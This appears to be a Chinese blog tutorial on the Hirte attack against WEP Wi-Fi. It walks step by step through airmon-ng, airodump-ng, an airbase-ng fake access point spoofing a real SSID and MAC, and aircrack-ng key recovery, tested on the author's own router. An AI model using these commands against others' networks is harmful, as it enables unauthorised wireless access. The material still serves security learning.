Kali-WIFI攻防(四)----WEP密码破解之Hirte工具

本文介绍了一种名为Hirte的WEPKey破解技术,并详细展示了使用Kali Linux进行Hirte攻击的实战步骤,包括创建假冒接入点、收集数据包及最终破解WEP密钥的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、工具简介


Hirte是破解无线网络WEP Key的一种攻击类型 


只要客户端设备(笔记本电脑,手机等)连接过的无线网络,那些WIFI即使是不在攻击者范围内也都能被破解,因为该wifi的WEP密钥和配置文件仍然存储在这些无线设备中。

实施这种攻击的要求是建立一个和WEP网络相同的SSID假冒接入点。当客户端设备尝试自动连接到无线网络设时,假冒接入点(攻击者机器)会对受害者设备进行ARP攻击,导致受害者设备将包含密钥流的数据包发出。

Hirte破解原理:

1.安装一个假的WEP AP(wifi名,mac地址要相同)并等待客户端连接

2.客户端的连接等待自动分配IP地址

3.客户端发送一个ARP数据包

4.获得了ARP分组,并且将其转换成一个ARP请求为同一客户机

5.客户回复

6.收集这些数据包

7.破解WEP密钥



二、Hirte实战



首先查看网卡信息:

root@kali:~# ifconfig



然后监听网卡:


root@kali:~# airmon-ng start wlan0




扫描附近的wifi


root@kali:~# airodump-ng wlan0mon



然后开始伪造AP,用airbase-ng工具建立WEP接入点。 -c变量定义通道,-W设置加密位、wlan0mon是接口、-N使Hirte攻击模式。


airbase-ng -c 11 -a EC:88:8F:F5:9C:20 --essid "TP-LINK_F59C20" -W 1 -N wlan0mon

在启动这个伪AP之前,我把路由器关了。




下一步配置airodump-ng捕捉数据包并保存数据包文件名字为HSEK。


root@kali:~# airodump-ng wlan0mon --bssid EC:88:8F:F5:9C:20 --write HSEK


然后就是一阵等。。。




上的的#Data到46924差不多跑了一个小时,才到。。。。


只要有客户端一连上来,就会进行攻击




然后就可以启动aircrack-ng从捕获的数据包:Hirte破解WEP密钥


root@kali:~# aircrack-ng HSEK-01.cap

他破解密码是有要求的,第一次ivs必须要大于5000,当小于这个数的话,就会提示




依次类推,知道密码破解出来为止,我这里用的是手机去连这个wifi的,而且只要一个终端连接的情况下,ivs走的好慢.....在他大于5000的时候,我等了好久。。。。一个多小时,等到他大于5000,然后执行上述命令,又提示要大于10000。。。




破解这个需要很多时间。。。

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值